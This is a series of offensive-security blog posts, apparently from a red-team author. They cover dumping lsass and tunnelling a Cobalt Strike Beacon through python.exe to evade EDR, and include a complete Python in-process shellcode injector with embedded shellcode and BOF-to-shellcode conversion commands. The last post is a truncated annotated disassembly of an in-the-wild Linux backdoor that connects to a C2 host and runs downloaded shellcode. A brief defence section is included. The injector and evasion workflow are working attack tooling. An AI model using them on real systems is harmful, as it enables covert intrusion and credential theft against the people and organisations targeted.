<p>We can dump lsass directly from Python.exe using <a href="https://github.com/helpsystems/nanodump">nanodump</a>, but we need to modify it a bit in order to work with our technique.
Since we’ll be executing a BOF without a Cobalt Strike Beacon running, we should get rid of all the internal Beacon API call because otherwise the BOF will crash.
We should also hardcode command line parameters to increase BOF execution stability thus getting rid of command line parsing functions.
Finally, we can choose our preferred method of dumping lsass and hardcode it too.</p>

<p>Bear in mind that with this technique <strong>no pyd files are dropped on disk</strong>.</p>

<p>The technique execution flow is depicted in the following scheme:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/exec_flow_3.png" alt="image-center" title="Dumping LSASS with Pyramid and nanodump" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Dumping LSASS with Pyramid and nanodump</em></td>
    </tr>
  </tbody>
</table>

<p>In the following video Pyramid has been executed to dump lsass on a machine equipped with a top-tier EDR (details have been blurred and I won’t name EDR product) using nanodump BOF and <a href="https://billdemirkapi.me/abusing-windows-implementation-of-fork-for-stealthy-memory-operations/">process forking technique</a>.</p>

<div class="gdrive-wrapper">
  <iframe src="https://drive.google.com/file/d/15mpJLH5AjOvmUz_CF2boaBMlsJt-C6uq/preview" allowfullscreen=""></iframe>
</div>

<p>You can find the modified nanodump used for the demo <a href="https://github.com/naksyn/Pyramid/tree/main/nanodump-main">here on my github</a></p>

<h4 id="in-process-c2-agent-injection">In-process C2 agent injection</h4>

<p>Executing a C2 agent increase chances of detection by memory scans, however certain scenarios might require an agent execution for the operation to continue.
For this reason Pyramid provide the capability of executing a C2 agent stager and tunnelling its traffic through SSH, all within the python.exe process.
This is achieved by first dynamically importing paramiko and then starting SSH local port forwarding to an attacker controlled SSH server in a new local thread.</p>

<p>The C2 agent shellcode is then injected and executed in-process. The stager should be generated using the host 127.0.0.1 as C2 server with the same port opened locally by the SSH local port forward.
The technique execution flow is depicted in the following scheme:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/exec_flow_2.png" alt="image-center" title="In-process tunneling a Cobalt Strike Beacon with Python" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>In-process tunneling a Cobalt Strike Beacon with Pyramid</em></td>
    </tr>
  </tbody>
</table>

<p>In the following video Pyramid has been executed to perform SSH local port forwarding and executing a Cobalt Strike Beacon stager tunneling its traffic over SSH.
The OS was equipped with a top-tier EDR also in this case.</p>

<div class="gdrive-wrapper">
  <iframe src="https://drive.google.com/file/d/1wZm8BHH7XO7bsD5hISA7U3cxt6Hssn0o/preview" allowfullscreen=""></iframe>
</div>

<h3 id="conclusions">Conclusions</h3>

<p>It has been demonstrated that Python provides some key properties that effectively creates blindspots for EDR detection, namely:</p>

<ol>
  <li>Python’s wide usage creates a varied baseline telemetry for Python interpreter that is natively running APIs. This can increase the difficulty for EDRs’ vendor to spot anomalies coming from python.exe or pythonw.exe.</li>
  <li>Python lacks transparency for dynamic code executed from python.exe or pythonw.exe.</li>
  <li>Python Foundation officially provides a “Windows embeddable package” that can be used to run Python with a minimal environment without installation. The package comes with signed binaries.</li>
</ol>

<p>These properties coupled with operational capabilities such as BOF execution, dynamic import of modules and in-process shellcode injection can help operating into EDRs’ blindspot.
<a href="https://github.com/naksyn/Pyramid">Pyramid</a> tool has been developed trying put together all the concepts presented in this post and bringing operational capabilities to be used from the Python Windows embeddable package.</p>

<h3 id="how-to-defend-from-this">How to defend from this</h3>

<p>One obvious way to defend from these techniques would be to flag Python interpreters as Potentially Unwanted Application, forcing EDR customers to investigate alerts and approve or deny Python usage for specific users. However I don’t think that it’ll be feasible in every situation.
Attackers could also bring their own interpreter and still use these techniques, but in doing so they’ll lose the Interpreter digital signature, so the attack effectiveness will probably be downgraded.</p>

<p>As an EDR vendor, I would also want to analyze python.exe and pythonw.exe behaviour without biases brought by the varied baseline telemetry that they would have.
In this way the Python binaries will be treated as if they were unknown, which is in fact true regarding their behaviour because API calls made by the interpreter are related to the Python code executed.</p>]]></content><author><name>Naksyn</name></author><category term="EDR evasion" /><category term="evasion" /><category term="redteam" /><category term="python" /><category term="pyramid" /><category term="cobalt strike" /><summary type="html"><![CDATA[]]></summary></entry><entry><title type="html">Running Cobalt Strike BOFs from Python</title><link href="https://www.naksyn.com/injection/2022/02/16/running-cobalt-strike-bofs-from-python.html" rel="alternate" type="text/html" title="Running Cobalt Strike BOFs from Python" /><published>2022-02-16T00:00:00-05:00</published><updated>2020-04-13T17:10:20-04:00</updated><id>https://www.naksyn.com/injection/2022/02/16/running-cobalt-strike-bofs-from-python</id><content type="html" xml:base="https://www.naksyn.com/injection/2022/02/16/running-cobalt-strike-bofs-from-python.html"><![CDATA[<p><img src="/images/coff.png" alt="image-center" title="Coughing BOFs from python!" class="align-center" /></p>

<h3 id="tldr">TL;DR</h3>
<p>Python might be used to run Cobalt Strike’s BOFs by using previous work from <a href="https://github.com/trustedsec/COFFLoader">Trustedsec</a> and <a href="https://medium.com/falconforce/bof2shellcode-a-tutorial-converting-a-stand-alone-bof-loader-into-shellcode-6369aa518548">FalconForce</a>, one can pick a BOF and use <a href="https://github.com/FalconForceTeam/BOF2shellcode">BOF2Shellcode</a> to embed the shellcode in a python injector. This brings some post-ex capabilities that could be added to existing frameworks or deployed from a gained foothold making use of a signed binary (python.exe) as a host process for running BOFs using local shellcode injection - PoC on <a href="https://github.com/naksyn/python-bof-runner">my github</a>.</p>

<h3 id="intro">Intro</h3>
<p>Python got great popularity as a C2 language in recent years and the offsec community brought many great projects like <a href="https://github.com/trustedsec/trevorc2">TrevorC2</a>, <a href="https://github.com/facebookarchive/WEASEL">WEASEL</a>, <a href="https://github.com/n1nj4sec/pupy">pupy</a>, etc. However, its popularity as a Windows-agent-language never really took off, mainly because of some significant limitations such as:</p>
<ol>
  <li>Final .exe size made huge because of Python interpreter dependencies to be included;</li>
  <li>Ease of getting source code from Python artifacts;</li>
  <li>Complexity of creating shellcode that executes python code.</li>
</ol>

<p>This drawbacks stem from the fact that Python is an interpreted language, so you basically have to bring the python interpreter and its dependencies with you, wether you’re creating a stage(r) shellcode or an .exe to deliver.
However, I would encompass these 3 big limitations under the “Getting Access” phase of an engagement since python will be basically ruled out if you’re trying to phish or exploit some vulnerability that requires stable and tiny shellcode.</p>

<p>But still, to me Python has so much yet to give during the “Post Exploitation” phase, because, well…<strong>“in the EDR era signed binaries are kings”</strong>, and it’s worth reminding that the official Python binary is signed indeed.
It’s also worth mentioning that in enterprise environments devs do crazy stuff so Python is pretty common almost everywhere.
Using python would be a viable way to blend-in on some machines, if we only had modern capabilities to leverage.</p>

<p>This thought has been placed in the backseats of my mind for quite some time, until I saw some recent brilliant projects
that opened up some new avenues.</p>

<h3 id="poc--gtfo">PoC || GTFO</h3>

<p>Earlier in 2021 Kevin Haubris from Trustedsec published a cool project called <a href="https://github.com/trustedsec/COFFLoader">COFFloader</a>, that basically lets you load and run Cobal Strikes Beacon Object Files (BOFs) outside of Cobalt Strike itself.
Some weeks ago Gijs Hollestelle from Falconforce published <a href="https://github.com/FalconForceTeam/BOF2shellcode">BOF2Shellcode</a> which essentially converts BOFs to raw shellcode and combines it with COFFLoader (converted too) in a way so that BOFs can be loaded by the same resulting shellcode.</p>

<p>Reading the FalconForce <a href="https://medium.com/falconforce/bof2shellcode-a-tutorial-converting-a-stand-alone-bof-loader-into-shellcode-6369aa518548">post</a> (I highly encourage to do it also since Gijs described the whole process to get things working) I understood that one could simply run BOFs also with python by using the shellcode generated by BOF2Shellcode and the help of an injector.
Let’s try this out. As an injector I opted for the local shellcode technique using <code class="language-plaintext highlighter-rouge">HeapAlloc</code> technique, to which I added a <code class="language-plaintext highlighter-rouge">VirtualProtect</code> to set execute-only permissions since this might be useful for evasion and shenanigans.
Bear in mind that by using execute-only permissions you’re out in the cold if using self decoding shellcodes or more complex ones.
This only works if the shellcode itself does not need WR permissions, and this might be the case with some BOFs.
Here’s the python injector I used:</p>

<figure class="highlight"><pre><code class="language-python" data-lang="python"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
</pre></td><td class="code"><pre><span class="s">"""
	Author: @naksyn

	BOF runner using Local shellcode injection with HeapAlloc()
        /CreateThread() and setting execute-only permissions with
	VirtualAlloc().
	Warning - stagers and shellcodes with self-decoding stubs
 	might not work, change permissions accordingly or remove
	VirtualProtect call by keeping RWX.

"""</span>

<span class="kn">from</span> <span class="nn">ctypes</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">from</span> <span class="nn">ctypes.wintypes</span> <span class="kn">import</span> <span class="o">*</span>

<span class="c1"># Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)- Author Bobby Cooke @0xBoku - https://www.exploit-db.com/exploits/49819
</span><span class="n">calc</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b</span><span class="s">"</span>
<span class="n">calc</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2</span><span class="s">"</span>
<span class="n">calc</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b</span><span class="s">"</span>
<span class="n">calc</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04</span><span class="s">"</span>
<span class="n">calc</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0</span><span class="s">"</span>
<span class="n">calc</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2</span><span class="s">"</span>
<span class="n">calc</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x48\x83\xec\x20\x41\xff\xd6</span><span class="s">"</span>

<span class="n">shellcode</span><span class="o">=</span><span class="n">calc</span>
<span class="n">kernel32</span> <span class="o">=</span> <span class="n">ctypes</span><span class="p">.</span><span class="n">windll</span><span class="p">.</span><span class="n">kernel32</span>
<span class="n">isx64</span> <span class="o">=</span> <span class="n">sizeof</span><span class="p">(</span><span class="n">c_void_p</span><span class="p">)</span> <span class="o">==</span> <span class="n">sizeof</span><span class="p">(</span><span class="n">c_ulonglong</span><span class="p">)</span>

<span class="n">_kernel32</span> <span class="o">=</span> <span class="n">WinDLL</span><span class="p">(</span><span class="s">'kernel32'</span><span class="p">)</span>
<span class="n">HEAP_ZERO_MEMORY</span> <span class="o">=</span> <span class="mh">0x00000008</span>
<span class="n">HEAP_CREATE_ENABLE_EXECUTE</span> <span class="o">=</span> <span class="mh">0x00040000</span>
<span class="n">PAGE_READ_EXECUTE</span> <span class="o">=</span> <span class="mh">0x20</span>
<span class="n">PAGE_EXECUTE</span><span class="o">=</span> <span class="mh">0x10</span>
<span class="n">ULONG_PTR</span> <span class="o">=</span> <span class="n">c_ulonglong</span> <span class="k">if</span> <span class="n">isx64</span> <span class="k">else</span> <span class="n">DWORD</span>
<span class="n">SIZE_T</span> <span class="o">=</span> <span class="n">ULONG_PTR</span>

<span class="c1"># Functions Prototypes
</span><span class="n">VirtualProtect</span> <span class="o">=</span> <span class="n">_kernel32</span><span class="p">.</span><span class="n">VirtualProtect</span>
<span class="n">VirtualProtect</span><span class="p">.</span><span class="n">restype</span> <span class="o">=</span> <span class="n">BOOL</span>
<span class="n">VirtualProtect</span><span class="p">.</span><span class="n">argtypes</span> <span class="o">=</span> <span class="p">[</span> <span class="n">LPVOID</span><span class="p">,</span> <span class="n">SIZE_T</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">,</span> <span class="n">PDWORD</span> <span class="p">]</span>

<span class="c1"># HeapAlloc()
</span><span class="n">HeapAlloc</span> <span class="o">=</span> <span class="n">_kernel32</span><span class="p">.</span><span class="n">HeapAlloc</span>
<span class="n">HeapAlloc</span><span class="p">.</span><span class="n">restype</span> <span class="o">=</span> <span class="n">LPVOID</span>
<span class="n">HeapAlloc</span><span class="p">.</span><span class="n">argtypes</span> <span class="o">=</span> <span class="p">[</span> <span class="n">HANDLE</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">,</span> <span class="n">SIZE_T</span> <span class="p">]</span>

<span class="c1"># HeapCreate()
</span><span class="n">HeapCreate</span> <span class="o">=</span> <span class="n">_kernel32</span><span class="p">.</span><span class="n">HeapCreate</span>
<span class="n">HeapCreate</span><span class="p">.</span><span class="n">argtypes</span> <span class="o">=</span> <span class="p">[</span><span class="n">DWORD</span><span class="p">,</span> <span class="n">SIZE_T</span><span class="p">,</span> <span class="n">SIZE_T</span><span class="p">]</span>
<span class="n">HeapCreate</span><span class="p">.</span><span class="n">restype</span> <span class="o">=</span> <span class="n">HANDLE</span>

<span class="c1"># RtlMoveMemory()
</span><span class="n">RtlMoveMemory</span> <span class="o">=</span> <span class="n">_kernel32</span><span class="p">.</span><span class="n">RtlMoveMemory</span>
<span class="n">RtlMoveMemory</span><span class="p">.</span><span class="n">argtypes</span> <span class="o">=</span> <span class="p">[</span><span class="n">LPVOID</span><span class="p">,</span> <span class="n">LPVOID</span><span class="p">,</span> <span class="n">SIZE_T</span> <span class="p">]</span>
<span class="n">RtlMoveMemory</span><span class="p">.</span><span class="n">restype</span> <span class="o">=</span> <span class="n">LPVOID</span>

<span class="c1"># CreateThread()
</span><span class="n">CreateThread</span> <span class="o">=</span> <span class="n">_kernel32</span><span class="p">.</span><span class="n">CreateThread</span>
<span class="n">CreateThread</span><span class="p">.</span><span class="n">argtypes</span> <span class="o">=</span> <span class="p">[</span> <span class="n">LPVOID</span><span class="p">,</span> <span class="n">SIZE_T</span><span class="p">,</span> <span class="n">LPVOID</span><span class="p">,</span> <span class="n">LPVOID</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">,</span> <span class="n">LPVOID</span> <span class="p">]</span>
<span class="n">CreateThread</span><span class="p">.</span><span class="n">restype</span> <span class="o">=</span> <span class="n">HANDLE</span>

<span class="c1"># WaitForSingleObject()
</span><span class="n">WaitForSingleObject</span> <span class="o">=</span> <span class="n">_kernel32</span><span class="p">.</span><span class="n">WaitForSingleObject</span>
<span class="n">WaitForSingleObject</span><span class="p">.</span><span class="n">argtypes</span> <span class="o">=</span> <span class="p">[</span><span class="n">HANDLE</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">]</span>
<span class="n">WaitForSingleObject</span><span class="p">.</span><span class="n">restype</span> <span class="o">=</span> <span class="n">DWORD</span>


<span class="n">heapHandle</span> <span class="o">=</span> <span class="n">HeapCreate</span><span class="p">(</span><span class="n">HEAP_CREATE_ENABLE_EXECUTE</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">shellcode</span><span class="p">),</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">HeapAlloc</span><span class="p">(</span><span class="n">heapHandle</span><span class="p">,</span> <span class="n">HEAP_ZERO_MEMORY</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">shellcode</span><span class="p">))</span>
<span class="k">print</span><span class="p">(</span><span class="s">'[+] Heap allocated at: {:08X}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">heapHandle</span><span class="p">))</span>
<span class="n">RtlMoveMemory</span><span class="p">(</span><span class="n">heapHandle</span><span class="p">,</span> <span class="n">shellcode</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">shellcode</span><span class="p">))</span>
<span class="k">print</span><span class="p">(</span><span class="s">'[+] Shellcode copied into memory.'</span><span class="p">)</span>

<span class="n">VirtualProtect</span><span class="p">(</span><span class="n">heapHandle</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">shellcode</span><span class="p">),</span> <span class="n">PAGE_EXECUTE</span> <span class="p">,</span> <span class="n">ctypes</span><span class="p">.</span><span class="n">c_ulong</span><span class="p">(</span><span class="mi">0</span><span class="p">))</span>
<span class="k">print</span><span class="p">(</span><span class="s">'[+] Set RX permissions on memory'</span><span class="p">)</span>
<span class="n">threadHandle</span> <span class="o">=</span> <span class="n">CreateThread</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">heapHandle</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">'[+] Executed Thread in current process.'</span><span class="p">)</span>
<span class="n">WaitForSingleObject</span><span class="p">(</span><span class="n">threadHandle</span><span class="p">,</span> <span class="mh">0xFFFFFFFF</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></pre></figure>

<p>At this point one would just need to grab the shellcode from Bof2Shellcode using a BOF of our choice, so I opted for Trustedsec’s <a href="https://github.com/trustedsec/CS-Situational-Awareness-BOF/blob/master/SA/tasklist/tasklist.x64.o">Tasklist</a> and used bof2shellcode to generate the resulting shellcode, including the COFFLoader:</p>

<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
</pre></td><td class="code"><pre>python3 bof2shellcode.py <span class="nt">-i</span> /home/naksyn/bofs/tasklist.x64.o <span class="nt">-o</span> tasklist.x64.bin
</pre></td></tr></tbody></table></code></pre></figure>

<p>I then used msfvenom to make tasklist.x64.bin trivially embeddable in a python script:</p>

<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
</pre></td><td class="code"><pre>msfvenom <span class="nt">-p</span> generic/custom <span class="nv">PAYLOADFILE</span><span class="o">=</span>tasklist.x64.bin <span class="nt">-f</span> python <span class="o">&gt;</span> sc_tasklist.txt
</pre></td></tr></tbody></table></code></pre></figure>

<p>So after pasting the shellcode into the python injector script let’s see the tasklist BOF coughed out by Python:</p>

<div class="gdrive-wrapper">
  <iframe src="https://drive.google.com/file/d/1TNE4Esjg8IwWmaCa28wWm9C7IDuU4Hm0/preview" allowfullscreen=""></iframe>
</div>

<p>⠀</p>

<h3 id="outro">Outro</h3>
<p>I’ve always been amazed by crowdsourced capabilities and their integration into toolsets. Some time ago <a href="https://twitter.com/joevest">Joe Vest</a> kickstarted a <a href="https://cobalt-strike.github.io/community_kit/">Community Kit</a>, a central repository of extensions written by the user community to extend the capabilities of Cobalt Strike. These extensions are written by some of the smartest people in the industry and being able to leverage them into other C2s it’s undoubtedly a “must have” feature.
Indeed, few days ago <a href="https://twitter.com/LittleJoeTables">Moloch</a> <a href="https://github.com/BishopFox/sliver/pull/573">Added support for extensions/BOFs</a> for the <a href="https://github.com/BishopFox/sliver">Sliver</a> framework written in Go.
The same capability could be leveraged with some effort on every C2 with Python-based agents and this post described one way to do it.</p>]]></content><author><name>Naksyn</name></author><category term="injection" /><category term="injection" /><category term="shellcode" /><category term="python" /><category term="BOF" /><category term="cobalt strike" /><category term="coff" /><summary type="html"><![CDATA[]]></summary></entry><entry><title type="html">Repurposing a Linux Assembly backdoor caught in the wild</title><link href="https://www.naksyn.com/backdoor/2020/04/13/repurposing-linux-backdoor.html" rel="alternate" type="text/html" title="Repurposing a Linux Assembly backdoor caught in the wild" /><published>2020-04-13T00:00:00-04:00</published><updated>2020-04-13T17:10:20-04:00</updated><id>https://www.naksyn.com/backdoor/2020/04/13/repurposing-linux-backdoor</id><content type="html" xml:base="https://www.naksyn.com/backdoor/2020/04/13/repurposing-linux-backdoor.html"><![CDATA[<p><img src="/images/radare2.png" alt="image-center" title="Cutter backdoor disassembly" class="align-center" /></p>

<p>This work is based on Aneesh Dogra’s <a href="https://anee.me/reversing-a-real-world-249-bytes-backdoor-aadd876c0a32">blogpost</a> describing a new small linux backdoor caught in the wild. The backdoor main functions are fairly explained in the blogpost, however I wanted to dig deeper and look under the hood to check how this backdoor can be repurposed.
I thought this might also be a good opportunity to sharpen my assembler skills while exploring some interesting concepts.
The backdoor essentially calls back to a C2 and downloads shellcode to be executed in the context of the current process.</p>

<p>As we are dealing with a 64 bit ELF, Linux x86_64 system calls use designated registers for the arguments.
The registers for the x86_64 calling sequence are:</p>
<ul>
  <li>RAX -&gt; system call number</li>
  <li>RDI -&gt; first argument</li>
  <li>RSI -&gt; second argument</li>
  <li>RDX -&gt; third argument</li>
  <li>R10 -&gt; fourth argument</li>
  <li>R8 -&gt; fifth argument</li>
  <li>R9 -&gt; sixth argument</li>
</ul>

<p>Results after syscalls are placed into RAX register, so it’s handy to keep the <a href="https://github.com/torvalds/linux/blob/master/arch/x86/entry/syscalls/syscall_64.tbl">syscall table from the linux kernel</a> for mapping which syscall has been invoked in the assembly code.
Syscalls are the interface between user programs and the Linux kernel. They are used to let the kernel perform various system tasks, such as file access, process management and networking.
Now let’s get our hands dirty and reverse the most important functionalities of the backdoor that Aneesh kindly <a href="https://github.com/lionaneesh/backdoors/blob/master/pay.bin">provided</a>.
Here is the full backdoor assembly with comments after my analysis:</p>

<figure class="highlight"><pre><code class="language-nasm" data-lang="nasm"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
</pre></td><td class="code"><pre><span class="err">129:</span> <span class="nf">entry0</span> <span class="p">(</span><span class="nv">int64_t</span> <span class="nv">arg3</span><span class="p">)</span><span class="c1">;</span>
<span class="c1">;</span>
<span class="err">0</span><span class="nf">x00400078</span>      <span class="nv">xor</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rdi</span>
<span class="err">0</span><span class="nf">x0040007b</span>      <span class="nv">push</span> <span class="mi">9</span>             
<span class="err">0</span><span class="nf">x0040007d</span>      <span class="nv">pop</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x0040007e</span>      <span class="nv">cdq</span>
<span class="err">0</span><span class="nf">x0040007f</span>      <span class="nv">mov</span> <span class="nb">dh</span><span class="p">,</span> <span class="mh">0x10</span>       <span class="c1">; 16</span>
<span class="err">0</span><span class="nf">x00400081</span>      <span class="nv">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rdx</span>       <span class="c1">; arg3 ; 4096</span>
<span class="err">0</span><span class="nf">x00400084</span>      <span class="nv">xor</span> <span class="nv">r9</span><span class="p">,</span> <span class="nv">r9</span>
<span class="err">0</span><span class="nf">x00400087</span>      <span class="nv">push</span> <span class="mh">0x22</span>          <span class="c1">; 34</span>
<span class="err">0</span><span class="nf">x00400089</span>      <span class="nv">pop</span> <span class="nv">r10</span>
<span class="err">0</span><span class="nf">x0040008b</span>      <span class="nv">mov</span> <span class="nb">dl</span><span class="p">,</span> <span class="mi">7</span>
<span class="err">0</span><span class="nf">x0040008d</span>      <span class="nv">syscall</span>            <span class="c1">; mmap syscall</span>
<span class="err">0</span><span class="nf">x0040008f</span>      <span class="nv">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x00400092</span>      <span class="nv">js</span> <span class="mh">0x4000e6</span>
<span class="err">0</span><span class="nf">x00400094</span>      <span class="nv">push</span> <span class="mh">0xa</span>           <span class="c1">; 10</span>
<span class="err">0</span><span class="nf">x00400096</span>      <span class="nv">pop</span> <span class="nv">r9</span>
<span class="err">0</span><span class="nf">x00400098</span>      <span class="nv">push</span> <span class="nb">rsi</span>           <span class="c1">; saves 4096 on the stack later use in read syscall</span>
<span class="err">0</span><span class="nf">x00400099</span>      <span class="nv">push</span> <span class="nb">rax</span>           <span class="c1">; saves mmapped address on the stack later use in read syscall and shellcode execution</span>
<span class="err">0</span><span class="nf">x0040009a</span>      <span class="nv">push</span> <span class="mh">0x29</span>          <span class="c1">; 41</span>
<span class="err">0</span><span class="nf">x0040009c</span>      <span class="nv">pop</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x0040009d</span>      <span class="nv">cdq</span>
<span class="err">0</span><span class="nf">x0040009e</span>      <span class="nv">push</span> <span class="mi">2</span>             
<span class="err">0</span><span class="nf">x004000a0</span>      <span class="nv">pop</span> <span class="nb">rdi</span>
<span class="err">0</span><span class="nf">x004000a1</span>      <span class="nv">push</span> <span class="mi">1</span>             
<span class="err">0</span><span class="nf">x004000a3</span>      <span class="nv">pop</span> <span class="nb">rsi</span>
<span class="err">0</span><span class="nf">x004000a4</span>      <span class="nv">syscall</span>            <span class="c1">; socket syscall</span>
<span class="err">0</span><span class="nf">x004000a6</span>      <span class="nv">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000a9</span>      <span class="nv">js</span> <span class="mh">0x4000e6</span>        <span class="c1">; jump forward to exit block if socket unsuccessful</span>
<span class="err">0</span><span class="nf">x004000ab</span>      <span class="nv">xchg</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rdi</span>
<span class="err">0</span><span class="nf">x004000ad</span>      <span class="nv">movabs</span> <span class="nb">rcx</span><span class="p">,</span> <span class="mh">0xc2edf86839050002</span> <span class="c1">; gets here if socket successful or connect unsuccessful and after nanosleep</span>
<span class="err">0</span><span class="nf">x004000b7</span>      <span class="nv">push</span> <span class="nb">rcx</span>           <span class="c1">; holds the connect addr structure</span>
<span class="err">0</span><span class="nf">x004000b8</span>      <span class="nv">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rsp</span>       <span class="c1">; pointer to the addr structure</span>
<span class="err">0</span><span class="nf">x004000bb</span>      <span class="nv">push</span> <span class="mh">0x10</span>          <span class="c1">; 16</span>
<span class="err">0</span><span class="nf">x004000bd</span>      <span class="nv">pop</span> <span class="nb">rdx</span>
<span class="err">0</span><span class="nf">x004000be</span>      <span class="nv">push</span> <span class="mh">0x2a</span>          <span class="c1">; 42</span>
<span class="err">0</span><span class="nf">x004000c0</span>      <span class="nv">pop</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000c1</span>      <span class="nv">syscall</span>            <span class="c1">; connect syscall</span>
<span class="err">0</span><span class="nf">x004000c3</span>      <span class="nv">pop</span> <span class="nb">rcx</span>
<span class="err">0</span><span class="nf">x004000c4</span>      <span class="nv">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000c7</span>      <span class="nv">jns</span> <span class="mh">0x4000ee</span>       <span class="c1">; jump to read and execute shellcode if connect successful</span>
<span class="err">0</span><span class="nf">x004000c9</span>      <span class="nv">dec</span> <span class="nv">r9</span>
<span class="err">0</span><span class="nf">x004000cc</span>      <span class="nv">je</span> <span class="mh">0x4000e6</span>        <span class="c1">; decrement 10 1 by 1 and compares it with -1 (connect returned error)</span>
<span class="err">0</span><span class="nf">x004000ce</span>      <span class="nv">push</span> <span class="nb">rdi</span>
<span class="err">0</span><span class="nf">x004000cf</span>      <span class="nv">push</span> <span class="mh">0x23</span>          <span class="c1">; 35</span>
<span class="err">0</span><span class="nf">x004000d1</span>      <span class="nv">pop</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000d2</span>      <span class="nv">push</span> <span class="mi">0</span>
<span class="err">0</span><span class="nf">x004000d4</span>      <span class="nv">push</span> <span class="mi">5</span>             
<span class="err">0</span><span class="nf">x004000d6</span>      <span class="nv">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rsp</span>
<span class="err">0</span><span class="nf">x004000d9</span>      <span class="nv">xor</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rsi</span>
<span class="err">0</span><span class="nf">x004000dc</span>      <span class="nv">syscall</span>            <span class="c1">; nanosleep syscall</span>
<span class="err">0</span><span class="nf">x004000de</span>      <span class="nv">pop</span> <span class="nb">rcx</span>
<span class="err">0</span><span class="nf">x004000df</span>      <span class="nv">pop</span> <span class="nb">rcx</span>
<span class="err">0</span><span class="nf">x004000e0</span>      <span class="nv">pop</span> <span class="nb">rdi</span>
<span class="err">0</span><span class="nf">x004000e1</span>      <span class="nv">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span>
